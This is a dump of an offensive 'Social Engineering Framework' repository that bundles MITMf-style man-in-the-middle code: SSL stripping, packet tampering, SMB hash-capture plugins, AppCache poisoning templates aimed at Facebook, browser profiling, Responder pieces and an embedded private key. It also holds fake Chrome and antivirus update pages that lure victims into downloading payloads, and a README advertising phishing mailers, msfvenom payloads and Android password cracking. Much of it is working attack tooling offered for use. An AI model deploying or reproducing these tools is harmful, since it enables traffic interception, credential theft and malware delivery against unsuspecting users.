23 | - Access has been blocked. Please download and install the new Captive Portal Client in order to access internet resources.
24 |
25 |
26 |
19 |
Client Required
20 | -
21 |
- Access has been blocked. Please download and install the new Proxy Client in order to access internet resources. 24 |
22 |
27 |
28 |
29 |
30 |
31 |
32 |
--------------------------------------------------------------------------------
/sniffer/core/sslstrip/README.md:
--------------------------------------------------------------------------------
1 | sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
2 | attacks.
3 |
4 | It requires Python 2.5 or newer, along with the 'twisted' python module.
5 |
6 | Installing:
7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz
8 | * Install twisted: sudo apt-get install python-twisted-web
9 | * (Optionally) run 'python setup.py install' as root to install,
10 | or you can just run it out of the directory.
11 |
12 | Running:
13 | sslstrip can be run from the source base without installation.
14 | Just run 'python sslstrip.py -h' as a non-root user to get the
15 | command-line options.
16 |
17 | The four steps to getting this working (assuming you're running Linux)
18 | are:
19 |
20 | 1) Flip your machine into forwarding mode (as root):
21 | echo "1" > /proc/sys/net/ipv4/ip_forward
22 |
23 | 2) Setup iptables to intercept HTTP requests (as root):
24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
19 |
New Security Policy: Website Blocked
20 | -
21 |
22 |
27 |
28 |
29 |
30 |
31 |
32 |
--------------------------------------------------------------------------------
/sniffer/core/packetfilter.py:
--------------------------------------------------------------------------------
1 | from core.utils import set_ip_forwarding, iptables
2 | from core.logger import logger
3 | from scapy.all import *
4 | from traceback import print_exc
5 | from netfilterqueue import NetfilterQueue
6 |
7 | formatter = logging.Formatter("%(asctime)s [PacketFilter] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
8 | log = logger().setup_logger("PacketFilter", formatter)
9 |
10 | class PacketFilter:
11 |
12 | def __init__(self, filter):
13 | self.filter = filter
14 |
15 | def start(self):
16 | set_ip_forwarding(1)
17 | iptables().NFQUEUE()
18 |
19 | self.nfqueue = NetfilterQueue()
20 | self.nfqueue.bind(0, self.modify)
21 |
22 | self.nfqueue.run()
23 |
24 | def modify(self, pkt):
25 | #log.debug("Got packet")
26 | data = pkt.get_payload()
27 | packet = IP(data)
28 |
29 | for filter in self.filter:
30 | try:
31 | execfile(i)
32 | except Exception:
33 | log.debug("Error occurred in filter", filter)
34 | print_exc()
35 |
36 | pkt.set_payload(str(packet)) #set the packet content to our modified version
37 | pkt.accept() #accept the packet
38 |
39 | def stop(self):
40 | self.nfqueue.unbind()
41 | set_ip_forwarding(0)
42 | iptables().flush()
43 |
--------------------------------------------------------------------------------
/sniffer/libs/sslstrip/StrippingProxy.py:
--------------------------------------------------------------------------------
1 | # Copyright (c) 2004-2009 Moxie Marlinspike
2 | #
3 | # This program is free software; you can redistribute it and/or
4 | # modify it under the terms of the GNU General Public License as
5 | # published by the Free Software Foundation; either version 3 of the
6 | # License, or (at your option) any later version.
7 | #
8 | # This program is distributed in the hope that it will be useful, but
9 | # WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
11 | # General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program; if not, write to the Free Software
15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
16 | # USA
17 | #
18 |
19 | from twisted.web.http import HTTPChannel
20 | from ClientRequest import ClientRequest
21 |
22 | class StrippingProxy(HTTPChannel):
23 |
24 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
25 | This is the basic proxy server class, where we get callbacks for GET and POST methods.
26 | We then proxy these out using HTTP or HTTPS depending on what information we have about
27 | the (connection, client_address) tuple in our cache.
28 | '''
29 |
30 | requestFactory = ClientRequest
31 |
--------------------------------------------------------------------------------
/sniffer/config/app_cache_poison_templates/default.append:
--------------------------------------------------------------------------------
1 |
30 |
23 |
25 |
26 |
31 |
32 | AppCache poisoned
33 |
34 |
35 |
36 |
--------------------------------------------------------------------------------
/sniffer/core/sslstrip/StrippingProxy.py:
--------------------------------------------------------------------------------
1 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
2 | #
3 | # This program is free software; you can redistribute it and/or
4 | # modify it under the terms of the GNU General Public License as
5 | # published by the Free Software Foundation; either version 3 of the
6 | # License, or (at your option) any later version.
7 | #
8 | # This program is distributed in the hope that it will be useful, but
9 | # WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
11 | # General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program; if not, write to the Free Software
15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
16 | # USA
17 | #
18 |
19 | from twisted.web.http import HTTPChannel
20 | from ClientRequest import ClientRequest
21 |
22 | class StrippingProxy(HTTPChannel):
23 |
24 | '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
25 | This is the basic proxy server class, where we get callbacks for GET and POST methods.
26 | We then proxy these out using HTTP or HTTPS depending on what information we have about
27 | the (connection, client_address) tuple in our cache.
28 | '''
29 |
30 | requestFactory = ClientRequest
31 |
--------------------------------------------------------------------------------
/sniffer/core/ferretng/DnsCache.py:
--------------------------------------------------------------------------------
1 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
2 | #
3 | # This program is free software; you can redistribute it and/or
4 | # modify it under the terms of the GNU General Public License as
5 | # published by the Free Software Foundation; either version 3 of the
6 | # License, or (at your option) any later version.
7 | #
8 | # This program is distributed in the hope that it will be useful, but
9 | # WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
11 | # General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program; if not, write to the Free Software
15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
16 | # USA
17 | #
18 |
19 | class DnsCache:
20 |
21 | '''
22 | The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
23 | '''
24 |
25 | _instance = None
26 |
27 | def __init__(self):
28 | self.customAddress = None
29 | self.cache = {}
30 |
31 | @staticmethod
32 | def getInstance():
33 | if DnsCache._instance == None:
34 | DnsCache._instance = DnsCache()
35 |
36 | return DnsCache._instance
37 |
38 | def cacheResolution(self, host, address):
39 | self.cache[host] = address
40 |
41 | def getCachedAddress(self, host):
42 | if host in self.cache:
43 | return self.cache[host]
44 |
45 | return None
46 |
--------------------------------------------------------------------------------
/sniffer/plugins/SMBAuth.py:
--------------------------------------------------------------------------------
1 | from plugins.plugin import Plugin
2 | from plugins.Inject import Inject
3 | import sys
4 | import logging
5 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
6 | from scapy.all import get_if_addr
7 |
8 |
9 | class SMBAuth(Inject, Plugin):
10 | name = "SMBAuth"
11 | optname = "smbauth"
12 | desc = "Evoke SMB challenge-response auth attempts"
13 |
14 | def initialize(self, options):
15 | Inject.initialize(self, options)
16 | self.target_ip = options.host
17 | self.html_payload = self._get_data()
18 |
19 | if self.target_ip is None:
20 | try:
21 | self.target_ip = get_if_addr(options.interface)
22 | if self.target_ip == "0.0.0.0":
23 | sys.exit("[-] Interface %s does not have an IP address" % options.interface)
24 | except Exception, e:
25 | sys.exit("[-] Error retrieving interface IP address: %s" % e)
26 |
27 | print "[*] SMBAuth plugin online"
28 |
29 | def add_options(self, options):
30 | options.add_argument("--host", type=str, default=None, help="The ip address of your capture server [default: interface IP]")
31 |
32 | def _get_data(self):
33 | return 'AppCache Poison works!
37 |This page is spoofed with AppCache Poison by Krzysztof Kotowicz, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.
38 |![](\"\\\\%s\\image.jpg\")
'\
34 | '![](\"file://///%s\\image.jpg\")
'\
35 | '![](\"moz-icon:file:///%%5c/%s\\image.jpg\")
' % tuple([self.target_ip]*3)
36 |
--------------------------------------------------------------------------------
/sniffer/libs/responder/FindSQLSrv.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 | # Created by Laurent Gaffie
3 | # This file is part of the Responder toolkit.
4 | # Copyright (C) 2014 Trustwave Holdings, Inc.
5 | #
6 | # This program is free software: you can redistribute it and/or modify
7 | # it under the terms of the GNU General Public License as published by
8 | # the Free Software Foundation, either version 3 of the License, or
9 | # (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | # GNU General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU General Public License
17 | # along with this program. If not, see '\
37 | ''\
38 | '' % tuple([self.ip]*3)
39 |
40 | def options(self, options):
41 | pass
42 |
--------------------------------------------------------------------------------
/Scame/index.html:
--------------------------------------------------------------------------------
1 |
2 | Download and installation of upgrade required. 8 |
this security update resolves a vulnerabilty in Antivirus security.The vulnerabilty could allow remote code execution if a user views a specially crafted webage using 9 | any internet explorer.An attacker who successfully exploited this vulnerabilty could gain the same user rights as the current use.Customers whose accounts are 10 | configured to have fewer user rights on the system could be less impacted then those who operate with administrative user rights.
11 |This security update is rated Critical for Antivirus security to make it saftey and easy to use and make it clean from vulnerabilty to stop 12 | any opreation hacking you on network and make your wireless network very strong agints attacker.
13 | 14 |You can select your system type from below and please after download install software to make Antivirus saftey
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /sniffer/core/logger.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python2.7 2 | # -*- coding: utf-8 -*- 3 | 4 | # Copyright (c) 2014-2016 Marcello Salvati 5 | # 6 | # This program is free software; you can redistribute it and/or 7 | # modify it under the terms of the GNU General Public License as 8 | # published by the Free Software Foundation; either version 3 of the 9 | # License, or (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, but 12 | # WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | # General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program; if not, write to the Free Software 18 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 19 | # USA 20 | # 21 | 22 | import logging 23 | import sys 24 | 25 | 26 | class logger: 27 | 28 | log_level = None 29 | __shared_state = {} 30 | 31 | def __init__(self): 32 | self.__dict__ = self.__shared_state 33 | 34 | def setup_logger(self, name, formatter, logfile='./logs/mitmf.log'): 35 | fileHandler = logging.FileHandler(logfile) 36 | fileHandler.setFormatter(formatter) 37 | streamHandler = logging.StreamHandler(sys.stdout) 38 | streamHandler.setFormatter(formatter) 39 | 40 | logger = logging.getLogger(name) 41 | logger.propagate = False 42 | logger.addHandler(streamHandler) 43 | logger.addHandler(fileHandler) 44 | logger.setLevel(self.log_level) 45 | 46 | return logger 47 | -------------------------------------------------------------------------------- /sniffer/plugins/smbtrap.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2014-2016 Marcello Salvati 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | import random 19 | import string 20 | 21 | from plugins.plugin import Plugin 22 | 23 | class SMBTrap(Plugin): 24 | name = "SMBTrap" 25 | optname = "smbtrap" 26 | desc = "Exploits the SMBTrap vulnerability on connected clients" 27 | version = "1.0" 28 | 29 | def initialize(self, options): 30 | self.ip = options.ip 31 | 32 | def responsestatus(self, request, version, code, message): 33 | return {"request": request, "version": version, "code": 302, "message": "Found"} 34 | 35 | def responseheaders(self, response, request): 36 | self.clientlog.info("Trapping request to {}".format(request.headers['host']), extra=request.clientInfo) 37 | rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8)) 38 | response.responseHeaders.setRawHeaders('Location', ["file://{}/{}".format(self.ip, rand_path)]) 39 | -------------------------------------------------------------------------------- /sniffer/config/app_cache_poison_templates/test.replace: -------------------------------------------------------------------------------- 1 | 2 | 33 |
34 |
35 | AppCache poisoned
36 |
37 |
38 | Hurray!
39 |AppCache Poison by Krzysztof Kotowicz
40 | 41 |If you're seeing this, AppCache Poison works correctly. Try going to http://facebook.com to see it in action.
42 | 49 | -------------------------------------------------------------------------------- /sniffer/core/configwatcher.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | 3 | # Copyright (c) 2014-2016 Marcello Salvati 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU General Public License as 7 | # published by the Free Software Foundation; either version 3 of the 8 | # License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, but 11 | # WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program; if not, write to the Free Software 17 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 18 | # USA 19 | # 20 | import pyinotify 21 | import threading 22 | from configobj import ConfigObj 23 | 24 | class ConfigWatcher(pyinotify.ProcessEvent, object): 25 | 26 | @property 27 | def config(self): 28 | return ConfigObj("./config/mitmf.conf") 29 | 30 | def process_IN_MODIFY(self, event): 31 | self.on_config_change() 32 | 33 | def start_config_watch(self): 34 | wm = pyinotify.WatchManager() 35 | wm.add_watch('./config/mitmf.conf', pyinotify.IN_MODIFY) 36 | notifier = pyinotify.Notifier(wm, self) 37 | 38 | t = threading.Thread(name='ConfigWatcher', target=notifier.loop) 39 | t.setDaemon(True) 40 | t.start() 41 | 42 | def on_config_change(self): 43 | """ We can subclass this function to do stuff after the config file has been modified""" 44 | pass 45 | -------------------------------------------------------------------------------- /sniffer/plugins/sslstrip+.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2014-2016 Marcello Salvati 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import sys 20 | from plugins.plugin import Plugin 21 | 22 | class SSLstripPlus(Plugin): 23 | name = 'SSLstrip+' 24 | optname = 'hsts' 25 | desc = 'Enables SSLstrip+ for partial HSTS bypass' 26 | version = "0.4" 27 | tree_info = ["SSLstrip+ by Leonardo Nve running"] 28 | 29 | def initialize(self, options): 30 | self.options = options 31 | 32 | from core.sslstrip.URLMonitor import URLMonitor 33 | from core.servers.DNS import DNSChef 34 | from core.utils import iptables 35 | 36 | if iptables().dns is False and options.filter is False: 37 | iptables().DNS(self.config['MITMf']['DNS']['port']) 38 | 39 | URLMonitor.getInstance().setHstsBypass() 40 | DNSChef().setHstsBypass() 41 | 42 | def on_shutdown(self): 43 | from core.utils import iptables 44 | if iptables().dns is True: 45 | iptables().flush() 46 | -------------------------------------------------------------------------------- /sniffer/config/app_cache_poison_templates/facebook.append: -------------------------------------------------------------------------------- 1 | 30 |
31 |
32 | AppCache poisoned
33 |
34 |
35 |
36 |
39 |
46 |
47 |
--------------------------------------------------------------------------------
/sniffer/config/responder/responder.key:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
3 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
4 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
5 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
6 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
7 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS
8 | 1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY
9 | kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U
10 | YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R
11 | FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i
12 | erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ
13 | IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS
14 | nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL
15 | LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9
16 | cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1
17 | 5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf
18 | s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje
19 | ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2
20 | VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes
21 | AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35
22 | HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf
23 | VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm
24 | kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35
25 | f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp
26 | MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC
27 | -----END RSA PRIVATE KEY-----
28 |
--------------------------------------------------------------------------------
/sniffer/plugins/Upsidedownternet.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from cStringIO import StringIO
3 | from plugins.plugin import Plugin
4 | from PIL import Image
5 |
6 |
7 | class Upsidedownternet(Plugin):
8 | name = "Upsidedownternet"
9 | optname = "upsidedownternet"
10 | desc = 'Flips images 180 degrees'
11 | has_opts = False
12 | implements = ["handleResponse", "handleHeader"]
13 |
14 | def initialize(self, options):
15 | from PIL import Image, ImageFile
16 | globals()['Image'] = Image
17 | globals()['ImageFile'] = ImageFile
18 | self.options = options
19 |
20 | def handleHeader(self, request, key, value):
21 | '''Kill the image skipping that's in place for speed reasons'''
22 | if request.isImageRequest:
23 | request.isImageRequest = False
24 | request.isImage = True
25 | request.imageType = value.split("/")[1].upper()
26 |
27 | def handleResponse(self, request, data):
28 | try:
29 | isImage = getattr(request, 'isImage')
30 | except AttributeError:
31 | isImage = False
32 |
33 | if isImage:
34 | try:
35 | image_type = request.imageType
36 | #For some reason more images get parsed using the parser
37 | #rather than a file...PIL still needs some work I guess
38 | p = ImageFile.Parser()
39 | p.feed(data)
40 | im = p.close()
41 | im = im.transpose(Image.ROTATE_180)
42 | output = StringIO()
43 | im.save(output, format=image_type)
44 | data = output.getvalue()
45 | output.close()
46 | logging.info("Flipped image")
47 | except Exception as e:
48 | print "Error: %s" % e
49 | return {'request': request, 'data': data}
50 |
--------------------------------------------------------------------------------
/sniffer/libs/sslstrip/ServerConnectionFactory.py:
--------------------------------------------------------------------------------
1 | # Copyright (c) 2004-2009 Moxie Marlinspike
2 | #
3 | # This program is free software; you can redistribute it and/or
4 | # modify it under the terms of the GNU General Public License as
5 | # published by the Free Software Foundation; either version 3 of the
6 | # License, or (at your option) any later version.
7 | #
8 | # This program is distributed in the hope that it will be useful, but
9 | # WITHOUT ANY WARRANTY; without even the implied warranty of
10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
11 | # General Public License for more details.
12 | #
13 | # You should have received a copy of the GNU General Public License
14 | # along with this program; if not, write to the Free Software
15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
16 | # USA
17 | #
18 |
19 | import logging
20 | from twisted.internet.protocol import ClientFactory
21 |
22 | class ServerConnectionFactory(ClientFactory):
23 |
24 | def __init__(self, command, uri, postData, headers, client):
25 | self.command = command
26 | self.uri = uri
27 | self.postData = postData
28 | self.headers = headers
29 | self.client = client
30 |
31 | def buildProtocol(self, addr):
32 | return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
33 |
34 | def clientConnectionFailed(self, connector, reason):
35 | logging.debug("Server connection failed.")
36 |
37 | destination = connector.getDestination()
38 |
39 | if (destination.port != 443):
40 | logging.debug("Retrying via SSL")
41 | self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
42 | else:
43 | try:
44 | self.client.finish()
45 | except:
46 | pass
47 |
--------------------------------------------------------------------------------
/sniffer/plugins/browserprofiler.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python2.7
2 |
3 | # Copyright (c) 2014-2016 Marcello Salvati
4 | #
5 | # This program is free software; you can redistribute it and/or
6 | # modify it under the terms of the GNU General Public License as
7 | # published by the Free Software Foundation; either version 3 of the
8 | # License, or (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful, but
11 | # WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
13 | # General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU General Public License
16 | # along with this program; if not, write to the Free Software
17 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
18 | # USA
19 | #
20 | import json
21 |
22 | from pprint import pformat
23 | from plugins.plugin import Plugin
24 | from plugins.inject import Inject
25 |
26 | class BrowserProfiler(Inject, Plugin):
27 | name = "BrowserProfiler"
28 | optname = "browserprofiler"
29 | desc = "Attempts to enumerate all browser plugins of connected clients"
30 | version = "0.3"
31 |
32 | def initialize(self, options):
33 | Inject.initialize(self, options)
34 | self.js_file = "./core/javascript/plugindetect.js"
35 | self.output = {} # so other plugins can access the results
36 |
37 | def request(self, request):
38 | if (request.command == 'POST') and ('clientprfl' in request.uri):
39 | request.handle_post_output = True
40 | self.output = json.loads(request.postData)
41 | self.output['ip'] = request.client.getClientIP()
42 | pretty_output = pformat(self.output)
43 | self.clientlog.info("Got profile:\n{}".format(pretty_output), extra=request.clientInfo)
44 |
45 | def options(self, options):
46 | pass
47 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Social Engineering Framework We work on Facebook too!
37 |%%tamper_url%% page is spoofed with AppCache Poison by Krzysztof Kotowicz, but this is just a default content. To replace it, create facebook.append or facebook.replace file and add your content there.
2 | Social Engineering Framework is a framework to hack mind and sniff and exploit and many features more.
3 |
4 | IT is tools to hack mind and make payload and malware.
5 | # INSTALL 6 | 1- First download framework use this command: 7 | ``` 8 | git clone https://github.com/ahmadnourallah/SEF.git 9 | ``` 10 | 2- Then go to directory tools and give permission to all tools files. 11 |
12 | 3- After that install the requirements the Requirements is:
13 | [1) Metasploit Framework](https://github.com/rapid7/metasploit-framework)
14 | [2) Sqlbrowser](https://github.com/sqlitebrowser/sqlitebrowser)
15 | [3) Ettercap](https://github.com/Ettercap/ettercap)
16 | 4- After install the requirements execute the install file and wait to finish.
17 | 5- Finally, type in the terminal seframework to run the tools. 18 | # Features 19 | 1- Make fake download scame.
20 | 2- Mass Mailer Attack (Send fake email use real gmail account).
21 | 3- Sniif packets on your network use mitmf python script.
22 | 4- Payload creator and listner (make payload use msfvenom and start listen use msfconsole).
23 | 5- Windows exploits browser (make automatic exploit to exploit in metasploit).
24 | 6- Bluetooth toolkit (scan deivce on your area, scan bluetooth service in specific device, evil twin attack on specific bluetooth, attack on specific service in device).
25 | 7- Android toolkit (get android shell, android app databases decoder, download file from device).
26 | 8- Hack android passowrd(pattern, pin, password).
27 | # Call US 28 | ####Ahmad Nourallah: 29 | Email: ahmadnurallah@gmail.com 30 | Facebook: fb.com/ahmadnurallah 31 | ####Dante Nourallah: 32 | Facebook: fb.com/dante.nourllah
33 | 34 | For More Information visit our wiki page ==> [Wiki](https://github.com/ahmadnourallah/SEF/wiki) 35 | 36 | 37 | 38 | -------------------------------------------------------------------------------- /sniffer/libs/responder/IMAPPackets.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # NBT-NS/LLMNR Responder 3 | # Created by Laurent Gaffie 4 | # Copyright (C) 2014 Trustwave Holdings, Inc. 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see
| What is this page | 15 |Why iam see this page | 16 |What should I do | 17 |Download | 18 |
|---|
23 |
What is this page
24 |This page to download the new version of the famous google chrome. You need this new version to become the browsing security in
25 |
26 | the Internet because the Internet contains many malicious viruses that may lead to malfunction your device or steal your personal
27 |
28 | information and photos. Internet will not be back again when unless you download the required runs.
Why iam see this page
30 |You are seeing this page because we found that your computer is not secure and vulnerable to penetration at any moment and that your
31 |
32 | data exposed also to theft or loss So you see this page you download google chrome strongest and the fastest and best in the world, Ante virus
33 |
34 | so please download and run the program and then the Internet will also but already the fastest security
What should I do
37 |All you have to do is go to the download section and download the version compatible with your system and your device after download,
38 |
39 | you must open the program and then the Internet will return better and faster than before if your type of program will appear in the Android
40 |
41 | applications on behalf MainActivity
42 |
Download
44 |Download the version compatible with your system and with your computer and download and then please turn it back up to the net and you have
45 |
46 | become a safe and better than ever before and thanks
@All right reserved to GooGle groub
61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /sniffer/core/servers/POP3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder 3 | # Original work by Laurent Gaffie - Trustwave Holdings 4 | # 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see